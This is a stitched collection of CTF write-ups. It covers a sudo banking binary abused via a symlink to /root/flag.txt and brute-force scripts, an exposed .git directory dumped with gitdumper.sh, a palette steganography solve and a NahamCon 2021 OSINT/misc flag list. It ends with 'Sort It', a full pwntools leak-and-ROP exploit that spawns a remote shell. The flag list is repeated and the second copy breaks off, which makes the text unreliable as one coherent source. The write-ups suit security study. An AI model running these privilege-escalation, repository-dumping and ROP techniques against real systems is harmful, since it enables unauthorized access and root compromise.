## Background My team mate [bigpick](https://github.com/bigpick) completed "Stage 1 of Path 4 in The Mission" and found the following source code and SSH key for Gus: https://github.com/gusrodry/development/blob/master/bank.c https://github.com/gusrodry/development/tree/master/config/.ssh And of course we need these files for this second part of the mission. ```wget https://raw.githubusercontent.com/gusrodry/development/master/bank.c``````wget -O gus_id_rsa https://raw.githubusercontent.com/gusrodry/development/master/config/.ssh/id_rsa``` ## Analysis On the remote system, the `bank` program and related files can be found under `/opt/banking`: ```gus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ ls -o /opt/banking/total 48-r-xr-xr-x 1 root 42960 Mar 11 05:32 bank-rw-rw-rw- 1 gus 0 Mar 11 05:32 clerk.dat-rw-rw-rw- 1 gus 0 Mar 11 05:32 customer.dat-rw-rw-rw- 1 gus 0 Mar 11 05:32 manager.dat-rw-rw-rw- 1 gus 32 Mar 11 05:32 recordInfo.txt``` And we have sudo privs for that one executable: ```gus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ grep gus /etc/sudoersgus ALL=(root) NOPASSWD:SETENV: /opt/banking/bank``` I tried running it locally first to see how it behaves. I experimented with a bunch of different things, but this is the most relevant path of execution. ### Create a customer account ```kali@kali:~/Downloads/banking_on_it$ touch clerk.dat customer.dat manager.dat recordInfo.txtkali@kali:~/Downloads/banking_on_it$ ./bankSeeding the PRNG and getting randomness for digital entropy... Welcome to bank system!!! Local time is: Sun Mar 14 14:19:54 2021 Choose the mode!**************************************************************************1.Create a customer account!************2.Log in as a customer!********3.Create a clerk account!***************4.Log in as a clerk!***********5.Create a manager account!*************6.Log in as a manager!*********7.Exit!************************************************************************************************************************************ 1Now you are creating a customer account, please input information as asked: Please input your name within 20-digit characaters: userPlease input your telephone number within 15-digit numbers: nonePlease input your address within 40-digit characters: nonePlease input your pin in 6-digit numbers: 111111Now you are given a card number which is used to log in, please record it down!!!Card id is: 61684890 Press any button to continue! Welcome to bank system!!! Local time is: Sun Mar 14 14:19:55 2021``` Creating a customer account triggers `addCustomer()` in bank.c which generates a new card id, and saves the new customer in customer.dat (binary data file). It also appends the following line to recordInfo.txt: ```61684890: Account is biuld in Sun Mar 14 14:19:55 2021``` ### Login as the customer ```Choose the mode!**************************************************************************1.Create a customer account!************2.Log in as a customer!********3.Create a clerk account!***************4.Log in as a clerk!***********5.Create a manager account!*************6.Log in as a manager!*********7.Exit!************************************************************************************************************************************ 2Please input the 8-digit card number: 61684890Please input the 6-digit pin: 111111Log in successfully!``` This calls into `logCustomer()` in bank.c and appends the following line to recordInfo.txt: ```61684890: Account has log in at Sun Mar 14 14:21:04 2021``` ### Access activities record ```Activities you could choose:****************************************************************************1.Withdrawal from account. *****2.Access to account information.******3.Change your pin number. *****4.Transfer money to others. ******5.Access to activities record.*****6.Log out. ****************************************************************************5Please enter the pin again: 11111161684890: Account is biuld in Sun Mar 14 14:19:55 202161684890: Account has log in at Sun Mar 14 14:21:04 2021``` This function reads each line in recordInfo.txt and prints it out if the first 8 characters matches our customer card id. This is the code in bank.c that processes recordInfo.txt: ```cfor(i = 0;i<9;i++) searchId[i] = 0;while (1){ flag3 = 0; if (fgets(searchId, 9, fptr) && strcmp(searchId, account.cardId) == 0) flag3 = 1; fseek(fptr, -8L, SEEK_CUR); fgets(buf, MAX_LINE, fptr); len = strlen(buf); if(len==7) break; buf[len - 1] = '\0'; if (flag3 == 1) printf("%s\n", buf); }``` We know the flag format starts with `flag{XXX` where each `X` is a hex digit (0-f), so we should be able to generate a customer.dat file with 4096 entries, covering every possible combination that could match the first 8 chars of the flag. Then if we symlink recordInfo.txt to /root/flag.txt, and our customer card id matches the first 8 chars of the flag, then accessing the activities record with that card id should print the flag for us, since it will be the first line in recordInfo.txt. ## Solution Generate customer.dat with all possible matches for the first 8 characters of the flag. ```c#include <stdio.h>#include <stdlib.h>#include <time.h>#include <string.h> typedef struct customer{ char cardId[9]; int state; char name[21]; char pin[7]; long long balance; char telNumber[16]; char address[41]; struct customer * next;} Customer; int main() { char *filename1="customer.dat"; char *alphabet="0123456789abcdef"; char *prefix="flag{"; FILE *fptr; fptr = fopen(filename1,"ab+"); if (fptr == NULL) { printf("failed to open %s\n", filename1); exit(1); } for (int i = 0; i < strlen(alphabet); i++) { for (int j = 0; j < strlen(alphabet); j++) { for (int k = 0; k < strlen(alphabet); k++) { Customer cust = {0}; strcpy(cust.cardId, prefix); cust.cardId[5] = alphabet[i]; cust.cardId[6] = alphabet[j]; cust.cardId[7] = alphabet[k]; strcpy(cust.name, cust.cardId); strcpy(cust.pin, "111111"); strcpy(cust.telNumber, "1800hackers"); strcpy(cust.address, "localhost"); fseek(fptr, 0L, SEEK_END); fwrite(&cust,sizeof(Customer),1,fptr); } } } fclose(fptr); return 0;}``` ```gcc -o gen_customers gen_customers.c && ./gen_customers``` Use pexpect to automatically try each card id and print the first line from `recordInfo.txt`: ```python#!/usr/bin/env python3import syssys.path.append('./pexpect')import pexpectalphabet = '0123456789abcdef' for i in alphabet: for j in alphabet: for k in alphabet: card = 'flag{' + i + j + k p = pexpect.spawn('sudo /opt/banking/bank') p.readline() p.sendline('2') p.expect('Please input the 8-digit card number:') p.sendline(card) p.expect('Please input the 6-digit pin:') p.sendline('111111') p.expect('Activities you could choose:') p.sendline('5') p.expect('Please enter the pin again:') p.sendline('111111') p.readline() p.readline() p.readline() print(p.readline()) p.sendcontrol('c')``` The remote system where we need to run this doesn't have pexpect or pip (or much of anything) installed, so we need to install pexpect to a local directory and then copy that to the remote system: ```kali@kali:~/Downloads/banking_on_it$ pip install --target=pexpect/ pexpect...kali@kali:~/Downloads/banking_on_it$ tar -cf pexpect.tar pexpect/``` Copy our generated customer.dat file, pexpect.tar, and solve.py to the system: ```kali@kali:~/Downloads/banking_on_it$ scp -r -i ~/gus_id_rsa -P 30616 customer.dat [email protected]:~/customer.dat 100% 512KB 758.8KB/s 00:00kali@kali:~/Downloads/banking_on_it$ scp -r -i ~/gus_id_rsa -P 30616 pexpect.tar [email protected]:~/pexpect.tar 100% 430KB 665.8KB/s 00:00kali@kali:~/Downloads/banking_on_it$ scp -r -i ~/gus_id_rsa -P 30616 solve.py [email protected]:~/solve.py 100% 1199 50.0KB/s 00:00``` Then login to the system, extract pexpect.tar, link recordInfo.txt to /root/flag.txt, and create clerk.dat and manager.dat. ```gus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ tar -xf pexpect.tar gus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ ln -s /root/flag.txt recordInfo.txtgus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ touch clerk.dat manager.dat``` ```gus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ ls -ltotal 956-rw-rw-r-- 1 gus gus 0 Mar 14 17:33 clerk.dat-rw-r--r-- 1 gus gus 524416 Mar 14 17:32 customer.dat-rw-rw-r-- 1 gus gus 0 Mar 14 17:33 manager.datdrwxr-xr-x 6 gus gus 4096 Mar 14 16:49 pexpect-rw-r--r-- 1 gus gus 440320 Mar 14 17:32 pexpect.tarlrwxrwxrwx 1 gus gus 14 Mar 14 17:33 recordInfo.txt -> /root/flag.txt-rwxr-xr-x 1 gus gus 809 Mar 14 17:36 solve.py``` Run the script to find the flag: ```gus@banking-on-it-eeb908d4ed2c2144-5f84f76f97-b6vn5:~$ ./solve.py ...b'flag{0fc: Account has log in at Sun Mar 14 17:38:37 2021\r\n'b'flag{0fd: Account has log in at Sun Mar 14 17:38:37 2021\r\n'b'flag{0fe: Account has log in at Sun Mar 14 17:38:38 2021\r\n'b'flag{0ff: Account has log in at Sun Mar 14 17:38:38 2021\r\n'b'flag{100: Account has log in at Sun Mar 14 17:38:39 2021\r\n'b'flag{101c109fc3b54ca2dc3167fe727deb8c}\r\n'b'flag{102: Account has log in at Sun Mar 14 17:38:39 2021\r\n'b'flag{103: Account has log in at Sun Mar 14 17:38:40 2021\r\n'b'flag{104: Account has log in at Sun Mar 14 17:38:40 2021\r\n'...``` The flag is: ```flag{101c109fc3b54ca2dc3167fe727deb8c}``` ## Things That Didn't Work I tried a bunch of different things locally that did not work on the remote system once sudo was in the mix: * gdb or ptrace: locally I was able to see what the first 8 chars in recordInfo.txt by setting a breakpoint in gdb, but the remote system didn't have gdb or ptrace. And since the command runs as root there, I couldn't use gdb or ptrace as a normal user anyway (permission denied).* scpying pwntools to remote system: my first version of solve.py used pwntools, which worked great locally. But pwntools pulls in a bunch of dependencies and turned into >150mb of packages once installed. When I tried to scp that tarball to the remote system to get the dependencies I needed, the container would restart either in the middle of the scp command, or when extracting the tarball. Our best guess was that there was a space constraint set on the container so it restarts if we cross a certain threshold. Pwntools was ultimately too big to copy to the system.* pwntools over ssh: I tried running my pwntools script locally but invoking an ssh command into the remote system. This would have been alright, if it weren't for needing sudo. There's some behavior here that I don't fully understand, but bottom line, I couldn't find a way to run my pwntools script locally in a way that could ssh to the remote system, sudo /opt/banking/bank, and capture the output correctly.* I tried using a series of quick bash and perl scripts using timeout command to escape from that infinite loop where it keeps calling fseek, but the timeout command was failing to kill each bank process, because of course that process was running as root. We needed some way to send Ctrl-C as input and not just a kill signal. But in the end, pexpect did the job, it was small enough to scp to the remote system without tripping over the storage constraint, and the methods for pexpect were very similar to what I was using from pwntools anyway.
# Meet the team ## The brief ```Recover the list of employees working at CONSTELLATIONS. With the flag of this challenge, you should find new information that will help with future challenges. You should find the flag for this challenge ON THIS constellations.page website. You will not find it on GitHub. HINT: "Can we please stop sharing our version control software out on our website?" HINT AGAIN: you are looking for a publicly accessible version control software folder published on the constellations.page website itself After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.```Again we have to look at the `constellations.page` page. And from `Bionic` we have the `meet-the-team.html` page! ## Page ![pag](./pag.png) We have to recover the list! Again we can use [webctf](https://github.com/xnomas/web-ctf-help) to find hints:```webctf https://constellations.page/meet-the-team.html =============COMMENTS============= [+] 1 : Vela, can we please stop sharing our version control software out on the public internet? <----[+] 2 : Bootstrap core CSS[+] 3 : Custom fonts for this template[+] 4 : Custom styles for this template[+] 5 : Navigation[+] 6 : Header[+] 7 : About Section[+] 8 : Contact Section[+] 9 : Footer[+] 10 : Bootstrap core JavaScript[+] 11 : Plugin JavaScript[+] 12 : Custom scripts for this template =============SCRIPTS============= [+] 1 : assets/vendor/jquery/jquery.min.js[+] 2 : assets/vendor/bootstrap/js/bootstrap.bundle.min.js[+] 3 : assets/vendor/jquery-easing/jquery.easing.min.js[+] 4 : assets/js/grayscale.min.js =============IMAGES============= sources:--------[+] 1 : assets/img/laptop.png alts:-----[+] 1 : ===================INTERESTING HEADERS=================== Server : Apache/2.4.25 (Debian)```We are looking for a popular Version Control service folder.... maybe `.git`:![nope](./nope.png)But nope! Time to go deeper! `.git/logs/`, also nothing. How about `.git/logs/HEAD`?```0000000000000000000000000000000000000000 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614124430 -0500 commit (initial): Added initial assets and landing page1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614124968 -0500 commit: Added the Meet The Team page87b17a86409582c162e260795afdf104dc1d46b1 8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 Leo Rison <[email protected]> 1614125173 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt8e9e7afad5d1f7c6c3dcf322a3a94aeebc1e0073 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125488 -0500 checkout: moving from master to 87b17a87b17a86409582c162e260795afdf104dc1d46b1 0780dea9ede681b1e4276d74740bb11056d97c39 Leo Rison <[email protected]> 1614125881 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt0780dea9ede681b1e4276d74740bb11056d97c39 87b17a86409582c162e260795afdf104dc1d46b1 Leo Rison <[email protected]> 1614125918 -0500 checkout: moving from 0780dea9ede681b1e4276d74740bb11056d97c39 to 87b17a86409582c162e260795afdf104dc1d46b187b17a86409582c162e260795afdf104dc1d46b1 1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a Leo Rison <[email protected]> 1614125954 -0500 checkout: moving from 87b17a86409582c162e260795afdf104dc1d46b1 to 1142cc1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 Leo Rison <[email protected]> 1614125972 -0500 commit: Added the Meet The Team page4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 e7d4663ac6b436f95684c8bfc428cef0d7731455 Leo Rison <[email protected]> 1614126014 -0500 commit: Management said I need to remove the team details so I redacted that page and added it to robots.txt```And we want to get to this:```1142cc3145fdba8d9eb8f9c9e7ee79bdfda64d9a 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60 Leo Rison <[email protected]> 1614125972 -0500 commit: Added the Meet The Team page```Before the removal. ## Dumping I used this [tool](https://github.com/internetwache/GitTools), specificaly `gitdumper.sh`:```gitdumper.sh https://constellations.page/.git/ git```So like this I got eeeeeverything. ```bashcd git; cd .git; git log commit 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60Author: Leo Rison <[email protected]>Date: Tue Feb 23 18:53:50 2021 -0500 Added the Meet The Team page ```And this is the commit we want, now just `git show 4c88ac1c56fe228267cf415c3ef87d7c3b8abd60`:```html ```Voila!
[Original writeup](http://quangntenemy.blogspot.com/2014/03/ructf-quals-2014.html) This is a very famous image. By finding and comparing it with the original image it can be concluded that there is no information hidden visually. Analysis with Caesum's StegSolve brought me to the conclusion that the only place to hide the flag is inside the palette. It is also suspicious to see only 14 colors used for the image while the palette contains 256 colors with a lot of repetition. ![nyan-palette.png](http://4.bp.blogspot.com/-kc7L5RZuCE4/Ux3UzmbRsuI/AAAAAAAAAIE/ej6RDIKLSAs/s1600/nyan-palette.png) After extracting the palette I found out that this is actually a DataMatrix barcode (thanks stypr). The rest is easy. The hidden text is `u.to/P4JUBg`, which is a link to the flag: `RUCTF_ca8250c2b4b50581afc9ffd1f403f3f2`
# Challenges - [Challenges](#challenges) - [OSINT](#osint) - [#NahamCon2021](#nahamcon2021) - [Read the rules](#read-the-rules) - [Hackerone](#hackerone) - [Discord Nahansec](#discord-nahansec) - [Merch Store](#merch-store) - [INE](#ine) - [HTB](#htb) - [Googgle Play](#googgle-play) - [Miscellaneous](#miscellaneous) - [esab64](#esab64) - [Shoelaces](#shoelaces) - [Pollex](#pollex) - [buzz](#buzz) - [Veebee](#veebee) ## OSINT ### #NahamCon2021 Twitter (<https://twitter.com/NahamSec>)`` flag{e36bc5a67dd2fe5f33b62123f78fbcef} `` ### Read the rules <https://ctf.nahamcon.com/rules>HTML Source `` flag{90bc54705794a62015369fd8e86e557b} `` ### Hackerone Discord[announcements](https://discord.com/channels/514337135491416065/534475139602055168) ``Synt{rr907q188039nr543o81sq237o6o6q0o}`` [CyberChef](https://gchq.github.io/CyberChef/)Recipe:rot13`` Flag{ee907d188039ae543b81fd237b6b6d0b} `` ### Discord Nahansec Channel sub-title is the flag. - UHC-BR- Red Team Village- Live Recon Village- IoT Village- INE Career Corner- HTB Village ### Merch Store ### INE <https://checkout.ine.com/starter-pass> Page inspection = Deep on the page there's this base64 string ```Bashecho "ZmxhZ3syOWZhMzA1YWFmNWUwMWU5ZWRjZjAxNDJlNGRkY2RiOX0=" | base64 -d``` `` flag{29fa305aaf5e01e9edcf0142e4ddcdb9} `` ### HTB Dropped in parts over twitter and discord<https://twitter.com/hackthebox_eu/status/1371146586391261189><https://discord.com/channels/473760315293696010/477042310467813376> ``flag{57a3ca8be987fb8b7ea0a72e1124e302}`` ### Googgle Play Hint: <https://twitter.com/jon_bottarini/status/1370926690612826112> <https://static.googleusercontent.com/media/www.google.com/pt-BR//about/appsecurity/play-rewards/Android_app_vulnerability_classes.pdf> search for flag{ camouflage font `` flag{a0a6cb3b4bc98bf2a34b7aed76aebf53} `` ## Miscellaneous ### esab64 ```Bash$cat esab64mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X``` [Cyberchef](https://gchq.github.io/CyberChef/)Recipe: 1. Reverse2. From Base643. Reverse ### Shoelaces ```Bash$strings shoelaces.jpg``` `` flag{137288e960a3ae9b148e8a7db16a69b0} `` ### Pollex More than one jpg file concatenated to identify used binwalk and to remove the second file used dd. ```Bash$ binwalk pollex.jpg DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, little-endian offset of first image directory: 8334 0x14E JPEG image data, JFIF standard 1.01364 0x16C TIFF image data, little-endian offset of first image directory: 8848 0x350 JPEG image data, JFIF standard 1.016731 0x1A4B Copyright string: "CopyrightOwner> <rdf:Seq/> </plus:CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Ste"6765 0x1A6D Copyright string: "CopyrightOwner> <plus:Licensor> <rdf:Seq/> </plus:Licensor> <dc:creator> <rdf:Seq> <rdf:li>Stevanovic Igor</rdf:li> </rdf:Seq> <"``` ```Bashdd if=pollex.jpg bs=512k | { dd bs=334 count=1 of=/dev/null; dd bs=512k of=trimmed_pollex.jpg; }``` Flag printed on the image trimmed_pollex.jpg`` flag{65c34alec121a286600ddd48fe36bc00} `` ### buzz ```Bashfile buzz gunzip buzz``` ``flag{b3a33db7ba04c4c9052ea06d9ff17869}`` ### Veebee To decode the VBE script have tried: <https://didierstevens.com/files/software/decode-vbe_V0_0_1.zip> But didn't work Google-fu find the tool <https://github.com/JohnHammond/vbe-decoder/> `` flag{f805593d933f5433f2a04f082f400d8c} ``
# NahamCon CTF 2021 ## Sort It! [medium] > Author: @M_alpha#3534>> Can you sort it?>> [sort_it](sort_it) [libc-2.31.so](libc-2.31.so) Tags: _pwn_ _x86-64_ _write-what-where_ _remote-shell_ ## Summary ```Sort the following words in alphabetical order. Words list: 1. orange2. note3. apple4. cup5. bread6. zebra7. hand8. fan9. lion10. pencil``` `sort_it` is a simple manual sorting (by swapping pairs of entries) program; the kind that you torture kids with in elementary school. But, what if some of those kids, _naaaaaaughty kids_, just like you, draw outside of the lines? What happens if you swap, say, `1` and `586291743596`? Let's find out. ## Analysis ### Checksec ``` Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled``` Hey, look at that, someone got all the mitigations for free by doing _nothing_ but using the `gcc` defaults. ### Decompile with Ghidra > `main` is too long to put here; all we need is the _main_ loop: ```c while (!bVar1) { clear(); print_words((long)&local_68); printf("Enter the number for the word you want to select: "); __isoc99_scanf(&DAT_001020a3,&local_78); getchar(); local_78 = local_78 + -1; printf("Enter the number for the word you want to replace it with: "); __isoc99_scanf(&DAT_001020a3,&local_70); getchar(); local_70 = local_70 + -1; swap((long)&local_68,local_78,local_70); clear(); print_words((long)&local_68); printf("Are the words sorted? [y/n]: "); fgets(yn,0x11,stdin); if (yn[0] != 'n') { if (yn[0] != 'y') { puts("Invalid choice"); getchar(); exit(0); } bVar1 = true; } } uVar2 = check((long)&local_68); if ((int)uVar2 != 0) { puts("You lose!"); exit(0); } puts("You win!!!!!"); if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { __stack_chk_fail(); } return 0;``` First of all, to _win_, we need to have a sorted list, otherwise we hit `exit` and any hope of exploit through overwriting the return address is dashed. Second point, look at `fgets(yn,0x11,stdin);`, it reads in 16 bytes into `yn` plus one for the training `\0` `fgets` tacts on. We'll need this for the _what_ part of our _write-what-where_. ```void swap(long param_1,long param_2,long param_3){ long in_FS_OFFSET; char local_18 [8]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); strncpy(local_18,(char *)(param_2 * 8 + param_1),8); strncpy((char *)(param_1 + param_2 * 8),(char *)(param_3 * 8 + param_1),8); strncpy((char *)(param_3 * 8 + param_1),local_18,8); if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { __stack_chk_fail(); } return;}``` Third point, `swap` does do not any input validation, it'll swap _anything<super>*</super>_. This is the _where_ in our _write-what-where_. > _<super>*</super>where_ is not _anywhere_; you are limited to `rw` areas of memory--look at the memory map. However, there are a lot of places to pick from if you know _where_ to look, including in libc. ### Let's go shopping We're going to first need to leak the base process address, the libc address, and the stack. Setting a break point at `b *main+188` and examining the stack: ```0x00007fffffffe300│+0x0000: 0x00007ffff7fa9980 → 0x00000000fbad208b ← $rsp0x00007fffffffe308│+0x0008: 0x00007ffff7e45dbc → <setbuffer+204> test DWORD PTR [rbx], 0x80000x00007fffffffe310│+0x0010: 0x00000000000000000x00007fffffffe318│+0x0018: 0x00000000000000010x00007fffffffe320│+0x0020: 0x000065676e61726f ("orange"?)0x00007fffffffe328│+0x0028: 0x0000000065746f6e ("note"?)0x00007fffffffe330│+0x0030: 0x000000656c707061 ("apple"?)0x00007fffffffe338│+0x0038: 0x0000000000707563 ("cup"?)0x00007fffffffe340│+0x0040: 0x0000006461657262 ("bread"?)0x00007fffffffe348│+0x0048: 0x000000617262657a ("zebra"?)0x00007fffffffe350│+0x0050: 0x00000000646e6168 ("hand"?)0x00007fffffffe358│+0x0058: 0x00000000006e6166 ("fan"?)0x00007fffffffe360│+0x0060: 0x000000006e6f696c ("lion"?)0x00007fffffffe368│+0x0068: 0x00006c69636e6570 ("pencil"?)0x00007fffffffe370│+0x0070: 0x00007fffffffe470 → 0x00000000000000010x00007fffffffe378│+0x0078: 0xa12f3ad5180b39000x00007fffffffe380│+0x0080: 0x0000000000000000 ← $rbp0x00007fffffffe388│+0x0088: 0x00007ffff7de50b3 → <__libc_start_main+243> mov edi, eax0x00007fffffffe390│+0x0090: 0x00007ffff7ffc620 → 0x00041379000000000x00007fffffffe398│+0x0098: 0x00007fffffffe478 → 0x00007fffffffe6fe → "/pwd/datajerk/nahamconctf2021/sort_it/sort_it"0x00007fffffffe3a0│+0x00a0: 0x00000001000000000x00007fffffffe3a8│+0x00a8: 0x000055555555539f → <main+0> push rbp``` It should be obvious what 1-10 are. 14 would then be the return address. This will be the target of our _write-what-where_, however we need to read this first to leak libc. `main` can be had from 18. We'll need this for the location of the global `yn`. Lastly, 11 will do for leaking the stack. That's it. We just need a bit of math and we can pop the box. ## Exploit Standard fare pwntools: ```python#!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./sort_it_patched') if args.REMOTE: p = remote('challenge.nahamcon.com', 32674) libc = ELF('./libc-2.31.so')else: p = process(binary.path) libc = binary.libc``` ```python# get libc addressp.sendlineafter('continue...','')p.sendlineafter('select: ','1')p.sendlineafter('with: ','14')p.recvuntil('1. ')_ = p.recv(6)libc_start_main = u64(_ + b'\0\0') - 243libc.address = libc_start_main - libc.sym.__libc_start_mainlog.info('libc.address: ' + hex(libc.address))p.sendlineafter('[y/n]: ','n')``` Above this will swap the libc leak with the first element in the list (`orange`). The provided libc is not dissimilar that what is included with Ubuntu 20.04, so the 243 offset should be the similar as well (and is). ```python# get main addressp.sendlineafter('select: ','1')p.sendlineafter('with: ','18')p.recvuntil('1. ')_ = p.recv(6)main = u64(_ + b'\0\0')binary.address = main - binary.sym.mainlog.info('binary.address: ' + hex(binary.address))log.info('yn: ' + hex(binary.sym.yn))p.sendlineafter('[y/n]: ','n') rop = ROP([binary])pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]``` Leak `main` just like how libc was leaked, however from position 18 vs. 14. Also there is no offset to worry about (see stack above in Analysis section). While here we need to find a `pop rdi` gadget for the next step. ```python# get stack addressp.sendlineafter('select: ','1')p.sendlineafter('with: ','11')p.recvuntil('1. ')_ = p.recv(6)stack = u64(_ + b'\0\0') - (0x00007fffffffe470 - 0x00007fffffffe320)log.info('1. element: ' + hex(stack))p.sendlineafter('[y/n]: ','n')p.sendlineafter('select: ','1')p.sendlineafter('with: ','11')p.sendlineafter('[y/n]: ',8*b'n' + p64(pop_rdi+1))``` Again, capture a leak, however this time the stack from position 11. Unlike the others this cannot be destructive, we need to swap it back. To compute the actually stack location of the first item we need to subtract `(0x00007fffffffe470 - 0x00007fffffffe320)` from the returned value (this is based on the stack diagram above, look around, you'll see why). Also notice unlike the previous two leaks the reply to the `[y/n]` question. It's 8 `n`s followed by the address of `pop_rdi+1` (a.k.a. `ret`). Remember `fgets` will take 17 (0x11) bytes and we need our attacks stack aligned, so write out any 8 bytes first starting with `n` followed by the value you need. Now we're ready to start swapping in our _ropchain_. ```python# rop chain# pop_rdi + 1line = 14p.sendlineafter('select: ',str(line))p.sendlineafter('with: ',str((binary.sym.yn-stack)//8+2))p.sendlineafter('[y/n]: ',8*b'n' + p64(pop_rdi)) # pop_rdi line += 1p.sendlineafter('select: ',str(line))p.sendlineafter('with: ',str((binary.sym.yn-stack)//8+2))p.sendlineafter('[y/n]: ',8*b'n' + p64(libc.search(b'/bin/sh').__next__())) # /bin/sh addressline += 1p.sendlineafter('select: ',str(line))p.sendlineafter('with: ',str((binary.sym.yn-stack)//8+2))p.sendlineafter('[y/n]: ',8*b'n' + p64(libc.sym.system)) # system callline += 1p.sendlineafter('select: ',str(line))p.sendlineafter('with: ',str((binary.sym.yn-stack)//8+2))p.sendlineafter('[y/n]: ',8*b'n' + b'A\0')``` Using the previous reply to the `[y/n]` questions we can start to _swap_ in our _ropchain_ starting from position 14 as identified in the stack discussion above (see Analysis section). The last `[y/n]` just needs a single `A` after 8 `n`s (see below): ```python# shit we really do have to sort, or do we? just change it all to Afor i in range(10): p.sendlineafter('select: ',str(i+1)) p.sendlineafter('with: ',str((binary.sym.yn-stack)//8+2)) if i < 9: p.sendlineafter('[y/n]: ',8*b'n' + b'A\0') else: p.sendlineafter('[y/n]: ','y') p.interactive()``` Right, so to _win_, to actually get our _ropchain_ to execute, we need to hit that sweet sweet return statement, and to do that we need to _win_ by having a sorted list. Or, just replace the list with `A`s, then just `y` that the list is sorted at the end and claim your prize. Output: ```bash# ./exploit.py REMOTE=1[*] '/pwd/datajerk/nahamconctf2021/sort_it/sort_it_patched' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled[+] Opening connection to challenge.nahamcon.com on port 31286: Done[*] '/pwd/datajerk/nahamconctf2021/sort_it/libc-2.31.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled[*] libc.address: 0x7f39427da000[*] binary.address: 0x56551fcf8000[*] yn: 0x56551fcfc030[*] Loaded 14 cached gadgets for './sort_it_patched'[*] 1. element: 0x7ffdc148c010[*] Switching to interactive modeYou win!!!!!$ iduid=1000(challenge) gid=1000 groups=1000$ ls -ltotal 48drwxr-xr-x 1 root 0 12288 Mar 6 06:18 bindrwxr-xr-x 1 root 0 4096 Mar 6 06:18 devdrwxr-xr-x 1 root 0 4096 Mar 6 06:18 etc-r--r--r-- 1 root 0 39 Mar 6 06:17 flag.txtlrwxrwxrwx 1 root 0 7 Mar 6 06:17 lib -> usr/liblrwxrwxrwx 1 root 0 9 Mar 6 06:17 lib32 -> usr/lib32lrwxrwxrwx 1 root 0 9 Mar 6 06:17 lib64 -> usr/lib64lrwxrwxrwx 1 root 0 10 Mar 6 06:17 libx32 -> usr/libx32---x--x--x 1 root 0 16648 Mar 6 06:17 sort_itdrwxr-xr-x 1 root 0 4096 Mar 6 06:17 usr$ cat flag.txtflag{150997c12bbc936a1bedfad00053cdb5}``` ## WTF is `sort_it_patched` ```#!/usr/bin/env python3 from pwn import * binary = ELF('sort_it')binary.write(0x1208,5*b'\x90')binary.save('sort_it_patched')os.chmod('sort_it_patched',0o755)``` I _loath_ hardcoded escape/ANSI sequences that clear the screen, add unnecessary color, etc... to these challenges. They are nothing more than an annoyance and add nothing for your learning, just your frustration. Patch it out. While you're add it, patch out `alarm` and any other shitfuckery that gets in your way (except for in this CTF's `smol` challenge where you actually _need_ to hack on `alarm` to win--pretty cool, so, I guess, think about what you patch out). While I have your attention... _Stego? Vigenere? Other not relevant ciphers, etc..._ Paaaaalease, you can do better.
# Challenges - [Challenges](#challenges) - [OSINT](#osint) - [#NahamCon2021](#nahamcon2021) - [Read the rules](#read-the-rules) - [Hackerone](#hackerone) - [Discord Nahansec](#discord-nahansec) - [Merch Store](#merch-store) - [INE](#ine) - [HTB](#htb) - [Googgle Play](#googgle-play) - [Miscellaneous](#miscellaneous) - [esab64](#esab64) - [Shoelaces](#shoelaces) - [Pollex](#pollex) - [buzz](#buzz) - [Veebee](#veebee) ## OSINT ### #NahamCon2021 Twitter (<https://twitter.com/NahamSec>)`` flag{e36bc5a67dd2fe5f33b62123f78fbcef} `` ### Read the rules <https://ctf.nahamcon.com/rules>HTML Source `` flag{90bc54705794a62015369fd8e86e557b} `` ### Hackerone Discord[announcements](https://discord.com/channels/514337135491416065/534475139602055168) ``Synt{rr907q188039nr543o81sq237o6o6q0o}`` [CyberChef](https://gchq.github.io/CyberChef/)Recipe:rot13`` Flag{ee907d188039ae543b81fd237b6b6d0b} `` ### Discord Nahansec Channel sub-title is the flag. - UHC-BR- Red Team Village- Live Recon Village- IoT Village- INE Career Corner- HTB Village ### Merch Store ### INE <https://checkout.ine.com/starter-pass> Page inspection = Deep on the page there's this base64 string ```Bashecho "ZmxhZ3syOWZhMzA1YWFmNWUwMWU5ZWRjZjAxNDJlNGRkY2RiOX0=" | base64 -d``` `` flag{29fa305aaf5e01e9edcf0142e4ddcdb9} `` ### HTB Dropped in parts over twitter and discord<https://twitter.com/hackthebox_eu/status/1371146586391261189><https://discord.com/channels/473760315293696010/477042310467813376> ``flag{57a3ca8be987fb8b7ea0a72e1124e302}`` ### Googgle Play Hint: <https://twitter.com/jon_bottarini/status/1370926690612826112> 